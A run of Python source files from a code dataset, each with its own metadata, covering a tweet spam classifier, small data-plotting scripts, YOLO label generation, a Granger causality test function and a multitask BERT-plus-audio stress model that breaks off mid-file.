count_vect.fit_transform(tweets)\n\ntfidf_transformer = TfidfTransformer()\nX_train_tfidf = tfidf_transformer.fit_transform(X_train_counts)\n\ndef save_sparse_csr(array):\n np.savez('../Etc/trainingTest2.npz', data=array.data, indices=array.indices,\n indptr=array.indptr, shape=array.shape)\n\ndef load_sparse_csr():\n loader = np.load('../Etc/trainingTest2.npz')\n return csr_matrix((loader['data'], loader['indices'], loader['indptr']), shape=loader['shape'])\n\nsave_sparse_csr(X_train_tfidf)\nf = open('../Etc/isSpamList.txt', 'w')\nf.write(str(targ))\n\nf = open('../Etc/featureVector.txt', 'w')\nf.write(str(featureVector))\n\nf = open('../Etc/tweetsTraining.txt', 'w')\nf.write(str(tweets))\n\ntraining_set = load_sparse_csr()\n\ndocs_new = ['are we sure this season is', 'never change, bronn', 'remembering the last episode is in 30 minutes', 'hound was looking for a']\ndocs_processed = []\nfor nd in docs_new:\n docs_processed.append(SpamTools.getTweetFeatureVectorString(nd, featureVector))\n\nprint(\"docs_processed: {}\".format(docs_processed))\n\n# TODO -> Era isso aqui que eu não tinha colocado na poc\n\"\"\"count_vect = CountVectorizer()\ncount_vect.fit_transform(tweets)\"\"\"\n\nX_new_counts = count_vect.transform(docs_new)\nX_new_tfidf = tfidf_transformer.transform(X_new_counts)\n\n\nclf = MultinomialNB().fit(training_set, targ)\npredicted = clf.predict(X_new_tfidf)\n\nprint(\"\\n\\nNB:\\n\")\nprint(\"pred: {}\".format(predicted))\n\nfor doc, category in zip(docs_new, predicted):\n print('%r => %s' % (doc, category))\n\nclfS = SVC().fit(training_set, targ)\npredictedS = clfS.predict(X_new_tfidf)\n\nprint(\"\\n\\nSVM:\\n\")\n\nprint(\"pred: {}\".format(predictedS))\n\nfor doc, category in zip(docs_new, predictedS):\n print('%r => %s' % (doc, category))","sub_path":"Scripts/TrainingTestScikit.py","file_name":"TrainingTestScikit.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"625309784","text":"import pandas as pd\r\nimport plotly.express as px\r\ndf=pd.read_csv(\"Copy+of+data+-+data.csv\")\r\nfigure=px.bar(df,x=\"date\",y=\"cases\")\r\nfigure.show()\r\ndata=df[\"cases\"].tolist()\r\ntotal=0\r\nfor i in range(0,len(data)):\r\n total=total+data[i]\r\nmean=total/ len(data)\r\nprint(mean)\r\nif(len(data)%2==1):\r\n median=data[int (len(data)/2)]\r\nprint(median)","sub_path":"mean.py","file_name":"mean.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"522478763","text":"import json\nfrom pprint import pprint\nimport csv\n#with open('timemaps/1.json', 'w+') as outfile:\nwith open('previousMC.csv', 'a+', newline='') as csvfile:\n\tfieldnames = ['Memento_Count']\n\twriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\twriter.writeheader()\n\tcsvfile.close()\n\nfor i in range(1,1001):\n\ttry:\t\n\t\t#loading json data if file is with .json extension\n\t\tjson_file = 'timemaps/' + str(i) +'.json'\n\t\tjson_data=open(json_file)\n\t\tdata = json.load(json_data)\n\t\t#accesing the number of mementos by counting number of keys in list\n\t\tj = data['mementos']['list']\n\t\t#pprint(len(j))\n\t\tjson_data.close()\n\t\tmementocount=len(j)\n\t\tjson_data.close()\n\t\twith open('previousMC.csv', 'a+', newline='') as csvfile:\n\t\t\tfieldnames = ['Memento_Count']\n\t\t\twriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\t\t\twriter.writerow({'Memento_Count': mementocount})\n\t\t\tcsvfile.close()\n\texcept:\n\t\tmementocount=0\n\t\t# memento count is zero if file extension is txt\n\t\twith open('previousMC.csv', 'a+', newline='') as csvfile:\n\t\t\tfieldnames = ['Memento_Count']\n\t\t\twriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\t\t\twriter.writerow({'Memento_Count': mementocount})\n\t\t\tcsvfile.close()\n\t\tpass\n\n\t#j = json.loads(outfile.read())\n\t#print (j[''])\n\t#outfile.close","sub_path":"Assignments/A9/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339458100","text":"#! /usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n##\n## Read in the data\n##\nampO1, phaseO1 = np.loadtxt('MFS1_phases.O1', usecols=[1,2], unpack=True)\n#ampO2, phaseO2 = np.loadtxt('MFS2_phases.O1', usecols=[1,2], unpack=True)\n\nampM1, phaseM1 = np.loadtxt('MFS1_phases.M2', usecols=[1,2], unpack=True)\n#ampM2, phaseM2 = np.loadtxt('MFS2_phases.M2', usecols=[1,2], unpack=True)\n\n#dt=10.0/60.0\n#time=dt*np.arange(len(ampO1))/24\nwindow=np.arange(1,len(ampO1)+1)\n\nplt.ion()\n\nplt.figure(3)\nplt.subplot(2,1,1)\nplt.grid(True)\n#plt.gca().invert_yaxis()\n#plt.xlim(-50,450)\n#plt.ylim(4,0)\nplt.plot(window, ampO1, 'ro-', label='MFS1 O1')\nplt.plot(window, ampM1, 'ro--', label='MFS1 M2')\nplt.ylabel('Amplitude')\nplt.title('MFS Tidal analysis -- Well MFS1')\n#plt.legend(loc='upper left')\nplt.legend(loc='best')\nplt.subplot(2,1,2)\nplt.grid(True)\n#plt.gca().invert_yaxis()\n#plt.xlim(-50,450)\n#plt.ylim(4,0)\nplt.plot(window, phaseO1, 'ro-', label='MFS1 O1')\nplt.plot(window, phaseM1, 'ro--', label='MFS1 M2')\nplt.xlabel('Window')\nplt.ylabel('Phase')\nplt.legend(loc='best')\n\nplt.savefig('MFS1_Phases.pdf')\n\nplt.show()\n","sub_path":"1_Data/PlotTideAnal_MFS1.py","file_name":"PlotTideAnal_MFS1.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"510732004","text":"import argparse\nimport glob\nimport os\nimport pickle\nfrom random import shuffle\nfrom csvloader import LABEL_NAMES\nfrom utils import get_train_test_meta_data, get_train_test_base\n\nparser = argparse.ArgumentParser(description='Process images for new dataset')\nparser.add_argument('-c', '--config', dest='config_path', required=True)\nparser.add_argument('--train_background',\n default=0, help='Number of background images to include in training', type=int)\nparser.add_argument('--test_background',\n default=0, help='Number of background images to include in testing', type=int)\nparser.add_argument('-bg_dir', '--background_directory', dest='background_directory', required=False)\n\nargs = parser.parse_args()\n\nif not args.background_directory is None:\n if not os.path.isdir(args.background_directory):\n print(\"Background directory given does not exist: %s\" % args.background_directory)\n quit()\nif args.train_background == args.test_background == 0 and not args.background_directory is None:\n print(\"Must give a background directory if # of test or train background chips to include is over 0.\")\n quit()\n\n# Load the configuration\nconfig = None\ntry:\n pickle_file_path = args.config_path\n pickle_file = open(pickle_file_path,'rb')\n config = pickle.load(pickle_file)\n\nexcept:\n raise Exception(\"Could not load file \" + pickle_file_path)\n\nLABELS = []\n\ntrain_base, test_base = get_train_test_base(config)\ntrain_meta, test_meta = get_train_test_meta_data(config)\n\nbackground_paths = []\nif args.train_background > 0 or args.test_background > 0:\n background_paths = glob.glob(os.path.join(args.background_directory, '*.jpg'))\nif args.train_background + args.test_background > len(background_paths):\n print(\"Not enough background images, in total there are %d images.\" % len(background_paths))\n quit()\n\nshuffle(background_paths)\n\ntrain_background_paths = []\ntest_background_paths = []\nif args.train_background > 0:\n train_background_paths = background_paths[:args.train_background]\nif args.test_background > 0:\n test_background_paths = background_paths[args.train_background:args.train_background + args.test_background]\n\n\ndef yolo_labels(meta, base):\n unique_classes = set()\n for img_filename in meta:\n txt_file_name = os.path.splitext(img_filename)[0] + \".txt\"\n m = meta[img_filename]\n h,w = m.crop.height, m.crop.width\n labels = []\n for hs in m.hotspots:\n center_x = hs.center_x/w\n center_y = hs.center_y/h\n box_w = hs.width/w\n box_h = hs.height/h\n lbl_idx = hs.label[0]\n label = LABEL_NAMES[lbl_idx]\n if not label in LABELS:\n LABELS.append(label)\n class_id = LABELS.index(label)\n unique_classes.add(class_id)\n labels.append(\"%d %.10f %.10f %.10f %.10f\" % (class_id, center_x, center_y, box_w, box_h))\n\n with open(os.path.join(base, txt_file_name), 'w') as f:\n for label in labels:\n f.write(\"%s\\n\" % label)\n return unique_classes\n\ndef image_list(meta, base, background_images, list_name = \"yolo.labels\"):\n list_file = os.path.join(base, list_name)\n all_filles = []\n for img_filename in meta:\n full_path = os.path.join(base, img_filename)\n all_filles.append(full_path)\n all_filles = all_filles + background_images\n\n shuffle(all_filles)\n\n with open(list_file, 'w') as f:\n for img in all_filles:\n f.write(\"%s\\n\" % img)\n\n return list_file\n\ndef gen_data_file(train_list, test_list, classes):\n names_file = os.path.join(config.generated_data_base, config.dataset_path,\"yolo.names\")\n backup_dir = os.path.join(config.generated_data_base, config.dataset_path,\"backup\")\n with open(names_file, 'w') as f:\n for c in classes:\n f.write(LABELS[c] + \"\\n\")\n data_content = \\\n \"classes = %d\\ntrain = %s\\nvalid = %s\\ntest = %s\\nnames = %s\\nbackup = %s\\n\" \\\n % (len(classes), train_list, test_list, test_list, names_file, backup_dir)\n data_file = os.path.join(config.generated_data_base, config.dataset_path,\"yolo.data\")\n\n with open(data_file, 'w') as f:\n f.write(data_content)\n\n\n\n\nunique_train = yolo_labels(train_meta, train_base)\nunique_test = yolo_labels(test_meta, test_base)\nclasses = list(unique_test.union(unique_train))\n\n\ntrain_list = image_list(train_meta, train_base, train_background_paths)\ntest_list = image_list(test_meta, test_base, test_background_paths)\ngen_data_file(train_list, test_list, classes)","sub_path":"dataset/archive/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"226070129","text":"def grangercausalitytests(x, maxlag, addconst=True, verbose=True):\n \"\"\"\n Four tests for granger non causality of 2 time series.\n\n All four tests give similar results. `params_ftest` and `ssr_ftest` are\n equivalent based on F test which is identical to lmtest:grangertest in R.\n\n Parameters\n ----------\n x : array_like\n The data for test whether the time series in the second column Granger\n causes the time series in the first column. Missing values are not\n supported.\n maxlag : {int, Iterable[int]}\n If an integer, computes the test for all lags up to maxlag. If an\n iterable, computes the tests only for the lags in maxlag.\n addconst : bool\n Include a constant in the model.\n verbose : bool\n Print results.\n\n Returns\n -------\n dict\n All test results, dictionary keys are the number of lags. For each\n lag the values are a tuple, with the first element a dictionary with\n test statistic, pvalues, degrees of freedom, the second element are\n the OLS estimation results for the restricted model, the unrestricted\n model and the restriction (contrast) matrix for the parameter f_test.\n\n Notes\n -----\n TODO: convert to class and attach results properly\n\n The Null hypothesis for grangercausalitytests is that the time series in\n the second column, x2, does NOT Granger cause the time series in the first\n column, x1. Grange causality means that past values of x2 have a\n statistically significant effect on the current value of x1, taking past\n values of x1 into account as regressors. We reject the null hypothesis\n that x2 does not Granger cause x1 if the pvalues are below a desired size\n of the test.\n\n The null hypothesis for all four test is that the coefficients\n corresponding to past values of the second time series are zero.\n\n `params_ftest`, `ssr_ftest` are based on F distribution\n\n `ssr_chi2test`, `lrtest` are based on chi-square distribution\n\n References\n ----------\n .. [1] https://en.wikipedia.org/wiki/Granger_causality\n\n .. [2] Greene: Econometric Analysis\n\n Examples\n --------\n \"\"\"\n x = array_like(x, \"x\", ndim=2)\n if not np.isfinite(x).all():\n raise ValueError(\"x contains NaN or inf values.\")\n addconst = bool_like(addconst, \"addconst\")\n verbose = bool_like(verbose, \"verbose\")\n try:\n maxlag = int_like(maxlag, \"maxlag\")\n if maxlag <= 0:\n raise ValueError(\"maxlag must a a positive integer\")\n lags = np.arange(1, maxlag + 1)\n except TypeError:\n lags = np.array([int(lag) for lag in maxlag])\n maxlag = lags.max()\n if lags.min() <= 0 or lags.size == 0:\n raise ValueError(\n \"maxlag must be a non-empty list containing only \"\n \"positive integers\"\n )\n\n if x.shape[0] <= 3 * maxlag + int(addconst):\n raise ValueError(\n \"Insufficient observations. Maximum allowable \"\n \"lag is {0}\".format(int((x.shape[0] - int(addconst)) / 3) - 1)\n )\n\n resli = {}\n\n for mlg in lags:\n result = {}\n if verbose:\n print(\"\\nGranger Causality\")\n print(\"number of lags (no zero)\", mlg)\n mxlg = mlg\n\n # create lagmat of both time series\n dta = lagmat2ds(x, mxlg, trim=\"both\", dropex=1)\n\n # add constant\n if addconst:\n dtaown = add_constant(dta[:, 1 : (mxlg + 1)], prepend=False)\n dtajoint = add_constant(dta[:, 1:], prepend=False)\n if (\n dtajoint.shape[1] == (dta.shape[1] - 1)\n or (dtajoint.max(0) == dtajoint.min(0)).sum() != 1\n ):\n raise InfeasibleTestError(\n \"The x values include a column with constant values and so\"\n \" the test statistic cannot be computed.\"\n )\n else:\n raise NotImplementedError(\"Not Implemented\")\n # dtaown = dta[:, 1:mxlg]\n # dtajoint = dta[:, 1:]\n\n # Run ols on both models without and with lags of second variable\n res2down = OLS(dta[:, 0], dtaown).fit()\n res2djoint = OLS(dta[:, 0], dtajoint).fit()\n\n # print results\n # for ssr based tests see:\n # http://support.sas.com/rnd/app/examples/ets/granger/index.htm\n # the other tests are made-up\n\n # Granger Causality test using ssr (F statistic)\n if res2djoint.model.k_constant:\n tss = res2djoint.centered_tss\n else:\n tss = res2djoint.centered_tss\n if (\n tss == 0\n or res2djoint.ssr == 0\n or np.isnan(res2djoint.rsquared)\n or (res2djoint.ssr / tss) < np.finfo(float).eps\n or res2djoint.params.shape[0] != dtajoint.shape[1]\n ):\n raise InfeasibleTestError(\n \"The Granger causality test statistic cannot be compute \"\n \"because the VAR has a perfect fit of the data.\"\n )\n fgc1 = (\n (res2down.ssr - res2djoint.ssr)\n / res2djoint.ssr\n / mxlg\n * res2djoint.df_resid\n )\n if verbose:\n print(\n \"ssr based F test: F=%-8.4f, p=%-8.4f, df_denom=%d,\"\n \" df_num=%d\"\n % (\n fgc1,\n stats.f.sf(fgc1, mxlg, res2djoint.df_resid),\n res2djoint.df_resid,\n mxlg,\n )\n )\n result[\"ssr_ftest\"] = (\n fgc1,\n stats.f.sf(fgc1, mxlg, res2djoint.df_resid),\n res2djoint.df_resid,\n mxlg,\n )\n\n # Granger Causality test using ssr (ch2 statistic)\n fgc2 = res2down.nobs * (res2down.ssr - res2djoint.ssr) / res2djoint.ssr\n if verbose:\n print(\n \"ssr based chi2 test: chi2=%-8.4f, p=%-8.4f, \"\n \"df=%d\" % (fgc2, stats.chi2.sf(fgc2, mxlg), mxlg)\n )\n result[\"ssr_chi2test\"] = (fgc2, stats.chi2.sf(fgc2, mxlg), mxlg)\n\n # likelihood ratio test pvalue:\n lr = -2 * (res2down.llf - res2djoint.llf)\n if verbose:\n print(\n \"likelihood ratio test: chi2=%-8.4f, p=%-8.4f, df=%d\"\n % (lr, stats.chi2.sf(lr, mxlg), mxlg)\n )\n result[\"lrtest\"] = (lr, stats.chi2.sf(lr, mxlg), mxlg)\n\n # F test that all lag coefficients of exog are zero\n rconstr = np.column_stack(\n (np.zeros((mxlg, mxlg)), np.eye(mxlg, mxlg), np.zeros((mxlg, 1)))\n )\n ftres = res2djoint.f_test(rconstr)\n if verbose:\n print(\n \"parameter F test: F=%-8.4f, p=%-8.4f, df_denom=%d,\"\n \" df_num=%d\"\n % (ftres.fvalue, ftres.pvalue, ftres.df_denom, ftres.df_num)\n )\n result[\"params_ftest\"] = (\n np.squeeze(ftres.fvalue)[()],\n np.squeeze(ftres.pvalue)[()],\n ftres.df_denom,\n ftres.df_num,\n )\n\n resli[mxlg] = (result, [res2down, res2djoint, rconstr])\n\n return resli","sub_path":"cs224w/grangercausalitytest.py","file_name":"grangercausalitytest.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"571245310","text":"from X86Instructions import *\n\nclass JumpPredicate():\n\tdef __init__(self,name):\n\t\tself.name = name\n\n\tdef __repr__(self):\n\t\treturn self.name\n\n\tdef __str__(self):\n\t\treturn self.name\n\nclass JumpPredicateEnum():\n\tNONE = JumpPredicate(\"jmp\")\n\tZERO = JumpPredicate(\"jz\")\n\tNOTZERO = JumpPredicate(\"jnz\")\n\tNEGATIVE = JumpPredicate(\"js\")\n\tNOTNEGATIVE = JumpPredicate(\"jns\")\n\tOVERFLOW = JumpPredicate(\"jo\")\n\tNOTOVERFLOW = JumpPredicate(\"jno\")\n\tCARRY = JumpPredicate(\"jc\")\n\tNOTCARRY = JumpPredicate(\"jnc\")\n\tBORROW = JumpPredicate(\"jb\")\n\tNOTBORROW = JumpPredicate(\"jae\")\n\tBORROWORZERO = JumpPredicate(\"jbe\")\n\tNOTBORROWNOTZERO = JumpPredicate(\"ja\")\n\tSIGNEDLESS = JumpPredicate(\"jl\")\n\tSIGNEDLESSOREQUAL = JumpPredicate(\"jle\")\n\tSIGNEDGREATER = JumpPredicate(\"jg\")\n\tSIGNEDGREATEROREQUAL = JumpPredicate(\"jge\")\n\nclass JumpInstruction(UnaryInstruction):\n\tdef __init__(self,operand,predicate=JumpPredicateEnum.NONE):\n\t\tif not isinstance(predicate,JumpPredicate):\n\t\t\traise Exception(\"predicate must be JumpPredicate.\")\n\t\tUnaryInstruction.__init__(self,operand)\n\t\tself.predicate = predicate\n\t\tself.operand = operand\n\n\tdef __repr__(self):\n\t\treturn x86InstructionToString(self.__class__.__name__,[self.predicate,self.operand])\n\n\tdef __str__(self):\n\t\treturn x86InstructionToString(self.__class__.__name__,[self.predicate,self.operand])\n\n\tdef printInstruction(self):\n\t\tsize = self.operand.size\n\t\treturn printUnaryX86Instruction(self.predicate.name,self.operand,\"\")\n","sub_path":"AssemblyAST/X86JumpInstructions.py","file_name":"X86JumpInstructions.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"112019273","text":"import json\nimport glob\nimport csv\nimport pickle as pkl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io\nfrom sklearn import svm, tree\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import normalize, scale\nfrom scipy.cluster.vq import whiten\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.manifold import TSNE\nfrom sklearn.linear_model import LinearRegression, LogisticRegression\nimport re\nimport os\n\nfrom transformers import BertTokenizer, BertForSequenceClassification, BertConfig, BertModel\nfrom transformers.optimization import AdamW, get_linear_schedule_with_warmup\nimport torch\nimport math\nimport time\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom liwc import LIWC\n\n\nfrom sklearn.model_selection import StratifiedKFold\n\nimport ass\n\n\ndef get_optimizers(model, learning_rate, adam_epsilon, weight_decay, num_training_steps):\n # Prepare optimizer and schedule (linear warmup and decay)\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": weight_decay},\n {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0},\n ]\n optimizer = AdamW(optimizer_grouped_parameters, lr=learning_rate, eps=adam_epsilon)\n # optimizer = SGD(optimizer_grouped_parameters, lr=learning_rate, momentum=0.9)\n\n scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0,\n num_training_steps=num_training_steps)\n return optimizer, scheduler\n\n\nclass DNNAudio(nn.Module):\n def __init__(self):\n super(DNNAudio, self).__init__()\n self.dim = 256\n self.layer1 = nn.Linear(88, self.dim)\n self.layer2 = nn.Linear(self.dim, self.dim)\n # self.layer2 = nn.Linear(256, 1)\n self.layer3 = nn.Linear(self.dim, self.dim)\n # self.layer3 = nn.Linear(256, 1)\n # self.layer4 = nn.Linear(self.dim, 1)\n self.layer4 = nn.Linear(self.dim, self.dim)\n # self.ln = nn.LayerNorm(256)\n # self.bn = nn.BatchNorm1d(256)\n\n def forward(self, input_features):\n # return F.relu(self.layer2(F.relu(self.layer1(input_features))))\n # return self.layer3(F.relu(self.layer2(F.relu(self.layer1(input_features)))))\n return self.layer4(F.relu(self.layer3(F.relu(self.layer2(F.relu(self.layer1(input_features)))))))\n\n\nclass config:\n mode = 'regression'\n\nclass jointTAMulti(nn.Module):\n def __init__(self, TRIconfig):\n super().__init__()\n self.bert = BertModel.from_pretrained('bert-base-uncased')\n self.dropout = nn.Dropout(0.1)\n self.text_emb = nn.Linear(768, 256)\n self.mode = TRIconfig.mode\n self.AudioNet = DNNAudio()\n self.activ = nn.Linear(512, 1)\n self.valence = nn.Linear(512,1)\n self.classify = nn.Linear(512, 2)\n\n def forward(self,\n input_ids,\n token_type_ids,\n attention_mask,\n labels,\n audio_features):\n audio_repr = self.AudioNet(audio_features)\n bert_outputs = self.bert(input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask)\n text_repr = self.text_emb(bert_outputs[1])\n final_repr = torch.cat([audio_repr, text_repr], dim=1)\n final_repr = self.dropout(final_repr)\n # logits = self.classifier(final_repr)\n # print(logits, labels)\n if self.mode == 'activ':\n logits = self.activ(final_repr)\n loss_fct = nn.MSELoss()\n out_loss = loss_fct(logits.view(-1), labels.view(-1))\n elif self.mode == 'valence':\n logits = self.valence(final_repr)\n loss_fct = nn.MSELoss()\n out_loss = loss_fct(logits.view(-1), labels.view(-1))\n else:\n logits = self.classify(final_repr)\n loss_fct = nn.CrossEntropyLoss()\n out_loss = loss_fct(logits.view(-1, 2), labels.view(-1))\n return out_loss, logits\n\n def set_mode(self, mode):\n self.mode = mode\n\n#=====================================================================================================================\nwith open('all_data_joint_fixed_single_task.pkl','rb') as dump_file:\n audios, activation_labels, valence_labels, stress_labels, input_ids, token_type_ids, attention_mask, cv5_ids = pkl.load(dump_file)\n\nprint(audios.shape)\nprint(activation_labels)\nprint(valence_labels)\nprint(stress_labels)\n\nsp = cv5_ids[2]\n# train_a, train_l, train_labels = audios[sp[0]], input_ids[sp[0]], valence_labels[sp[0]]\n# test_a, test_l, test_labels = audios[sp[1]], input_ids[sp[1]], valence_labels[sp[1]]\n# train_a, train_l, train_labels = audios[sp[0]], input_ids[sp[0]], activation_labels[sp[0]]\n# test_a, test_l, test_labels = audios[sp[1]], input_ids[sp[1]], activation_labels[sp[1]]\ntv_a, tv_l, tv_labels = audios[sp[0]], input_ids[sp[0]], stress_labels[sp[0]]\ntrain_num = len(tv_a) - 200\ntrain_a, train_l, train_labels = tv_a[:train_num], tv_l[:train_num], tv_labels[:train_num]\ndev_a, dev_l, dev_labels = tv_a[train_num:], tv_l[train_num:], tv_labels[train_num:]\ntest_a, test_l, test_labels = audios[sp[1]], input_ids[sp[1]], stress_labels[sp[1]]\n\ntrain_activ, dev_activ, test_activ, train_valence, dev_valence, test_valence = activation_labels[sp[0]][:train_num], \\\n activation_labels[sp[0]][train_num:], activation_labels[sp[1]], valence_labels[sp[0]][:train_num], \\\n valence_labels[sp[0]][train_num:], valence_labels[sp[1]],\n\ntv_token_type_ids, test_token_type_ids, tv_attention_mask, test_attention_mask = token_type_ids[sp[0]], \\\n token_type_ids[sp[1]], attention_mask[sp[0]], attention_mask[sp[1]]\n\ntrain_token_type_ids, train_attention_mask = tv_token_type_ids[:train_num], tv_attention_mask[:train_num]\ndev_token_type_ids, dev_attention_mask = tv_token_type_ids[train_num:], tv_attention_mask[train_num:]\n\nn_train = len(train_a)\nn_dev = len(dev_a)\nn_test = len(test_a)\n\n\nprint(train_l.shape, train_a.shape)\n\nTRIconfig = config()\nTRIconfig.mode = 'classify'\n\n# to Tensors\ntrain_labels, dev_labels, test_labels = torch.LongTensor(train_labels), torch.LongTensor(dev_labels), \\\n torch.LongTensor(test_labels)\ntrain_activ, dev_activ, test_activ, train_valence, dev_valence, test_valence = \\\n torch.FloatTensor(train_activ), torch.FloatTensor(dev_activ), torch.FloatTensor(test_activ), \\\n torch.FloatTensor(train_valence), torch.FloatTensor(dev_valence), torch.FloatTensor(test_valence)\n\ntrain_a, dev_a, test_a = torch.FloatTensor(train_a), torch.FloatTensor(dev_a), torch.FloatTensor(test_a)\n\ntrain_l, dev_l, test_l, train_token_type_ids, dev_token_type_ids, test_token_type_ids = torch.LongTensor(train_l), \\\n torch.LongTensor(dev_l), \\\n torch.LongTensor(test_l), \\\n torch.LongTensor(train_token_type_ids), \\\n torch.LongTensor(dev_token_type_ids), \\\n torch.LongTensor(test_token_type_ids)\n\ntrain_attention_mask, dev_attention_mask, test_attention_mask = torch.FloatTensor(train_attention_mask), \\\n torch.FloatTensor(dev_attention_mask), \\\n torch.FloatTensor(test_attention_mask)\n\n\nmodel = jointTAMulti(TRIconfig).to('cuda')\n\neval_every = 5\nbatch_size = 32\ntest_batch_size = 2\ndev_batch_size = 2\nmax_epochs = 1000\nt_total = math.ceil(n_train / batch_size) * max_epochs\nlr = 3e-4\nepsilon = 1e-8\nmax_grad_norm = 1.0\nweight_decay = 0.0\n\noptimizer, scheduler = get_optimizers(model, learning_rate=lr, adam_epsilon=epsilon, weight_decay=weight_decay,\n num_training_steps=t_total)\n\n# loss_fn = torch.nn.CrossEntropyLoss().cuda()\nmodel.train()\nmodel.zero_grad()\n# pre-training\npre_train_epoch = 0\n# model.set_mode('regression')\n\nsample_distribution = [0.33, 0.33, 0.34]\nmoving_metric_activ = []\nmoving_metric_valence = []\nmoving_metric_stress = []\nfor ep in range(max_epochs):\n total_samples = 0\n avg_loss = 0\n n_batch = 0\n model.train()\n print(sample_distribution)\n while total_samples < n_train:\n optimizer.zero_grad()\n selected_id = np.random.permutation(n_train)[:batch_size]\n batch_a = train_a[selected_id].to('cuda')\n batch_l = train_l[selected_id].to('cuda')\n\n batch_ty = train_token_type_ids[selected_id].to('cuda')\n batch_am = train_attention_mask[selected_id].to('cuda')\n # switch between modes uniformly\n selected_task = np.random.choice([0,1,2], p=sample_distribution)\n if selected_task == 0:\n ans = train_activ[selected_id].to('cuda')\n model.set_mode('activ')\n elif selected_task == 1:\n ans = train_valence[selected_id].to('cuda')\n model.set_mode('valence')\n else:\n ans = train_labels[selected_id].to('cuda')\n model.set_mode('classify')\n\n total_samples += batch_size\n loss, logits = model(input_ids=batch_l, token_type_ids=batch_ty, attention_mask=batch_am, labels=ans, audio_features=batch_a)\n # print(loss)\n # logits = torch.squeeze(logits, dim=1)\n # print(preds[0], preds[1])\n # print(preds.shape, ans.shape)\n # print(preds, ans)\n loss.backward()\n # print(loss.data.cpu().numpy())\n avg_loss += loss.data.cpu().numpy()\n n_batch += 1.\n\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_grad_norm)\n optimizer.step()\n scheduler.step()\n model.zero_grad()\n\n torch.cuda.empty_cache()\n\n del batch_l, batch_ty, batch_am, ans, batch_a\n torch.cuda.empty_cache()\n avg_loss = avg_loss / n_batch\n print(\"epoch: %d rmse/ce: %f\" % (ep + 1, avg_loss ** 0.5))\n\n # dev set metrics\n idx = 0\n model.eval()\n total_dev_loss_activ = 0.\n total_dev_loss_valence = 0.\n n_batch = 0\n dev_preds = np.array([])\n while idx < n_dev:\n dev_batch_a = dev_a[idx:(idx + dev_batch_size)].to('cuda')\n dev_batch_l = dev_l[idx:(idx + dev_batch_size)].to('cuda')\n dev_batch_ty = dev_token_type_ids[idx:(idx + dev_batch_size)].to('cuda')\n dev_batch_am = dev_attention_mask[idx:(idx + dev_batch_size)].to('cuda')\n dev_ans_activ = dev_activ[idx:(idx + dev_batch_size)].to('cuda')\n dev_ans_valence = dev_valence[idx:(idx + dev_batch_size)].to('cuda')\n dev_ans_stress = dev_labels[idx:(idx + dev_batch_size)].to('cuda')\n # run on each task\n model.set_mode('activ')\n loss_activ, _ = model(input_ids=dev_batch_l,\n token_type_ids=dev_batch_ty,\n attention_mask=dev_batch_am,\n labels=dev_ans_activ,\n audio_features=dev_batch_a)\n mse = loss_activ.data.cpu().numpy()\n total_dev_loss_activ += mse\n\n model.set_mode('valence')\n loss_valence, _ = model(input_ids=dev_batch_l,\n token_type_ids=dev_batch_ty,\n attention_mask=dev_batch_am,\n labels=dev_ans_valence,\n audio_features=dev_batch_a)\n mse = loss_valence.data.cpu().numpy()\n total_dev_loss_valence += mse\n\n model.set_mode('classify')\n _, logits = model(input_ids=dev_batch_l,\n token_type_ids=dev_batch_ty,\n attention_mask=dev_batch_am,\n labels=dev_ans_stress,\n audio_features=dev_batch_a)\n _, batch_eval_preds = logits.data.cpu().max(1)\n dev_preds = np.concatenate((dev_preds, batch_eval_preds), axis=-1)\n\n idx += dev_batch_size\n torch.cuda.empty_cache()\n n_batch += 1.\n\n del dev_batch_l, dev_batch_ty, dev_batch_am, dev_ans_activ, dev_ans_valence, dev_ans_stress, dev_batch_a\n torch.cuda.empty_cache()\n dev_loss_activ = (total_dev_loss_activ / n_batch) ** 0.5\n dev_loss_valence = (total_dev_loss_valence / n_batch) ** 0.5\n\n dev_precison, dev_recall, dev_fscore, support = precision_recall_fscore_support(dev_labels.cpu().numpy(), dev_preds,\n labels=[1], average=None)\n dev_acc = float(sum(dev_preds == dev_labels.cpu().numpy())) / len(dev_preds)\n # print(dev_preds, dev_labels.cpu().numpy())\n print(dev_loss_activ, dev_loss_valence, dev_acc, dev_precison, dev_recall, dev_fscore)\n moving_metric_activ.append(dev_loss_activ)\n moving_metric_valence.append(dev_loss_valence)\n moving_metric_stress.append(dev_acc)\n\n # update distribution\n if ep < 10:\n sample_distribution = [0.33, 0.33, 0.34]\n else:\n rate_active = dev_loss_activ / np.mean(moving_metric_activ[ep-10:ep]) * 10\n rate_valence = 